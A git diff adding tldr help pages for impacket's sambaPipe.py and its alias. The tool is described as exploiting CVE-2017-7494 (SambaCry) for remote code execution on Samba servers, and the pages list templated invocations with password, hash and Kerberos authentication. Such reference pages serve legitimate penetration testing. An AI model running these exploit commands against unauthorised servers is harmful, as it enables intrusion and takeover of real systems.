diff --git a/pages/common/impacket-sambapipe.md b/pages/common/impacket-sambapipe.md new file mode 100644 index 0000000000..b57fbde482 --- /dev/null +++ b/pages/common/impacket-sambapipe.md @@ -0,0 +1,7 @@ +# impacket-sambaPipe + +> This command is an alias of `sambaPipe.py`. + +- View documentation for the original command: + +`tldr sambaPipe.py` diff --git a/pages/common/sambapipe.py.md b/pages/common/sambapipe.py.md new file mode 100644 index 0000000000..cb21099c07 --- /dev/null +++ b/pages/common/sambapipe.py.md @@ -0,0 +1,24 @@ +# sambaPipe.py + +> Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution. +> More information: . + +- Upload and load a shared object file on a vulnerable Samba server: + +`sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}` + +- Authenticate using NTLM hashes instead of a password: + +`sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}` + +- Use Kerberos authentication for the target: + +`sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}` + +- Specify a domain controller IP for authentication: + +`sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}` + +- Use a custom port for the SMB connection: + +`sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}`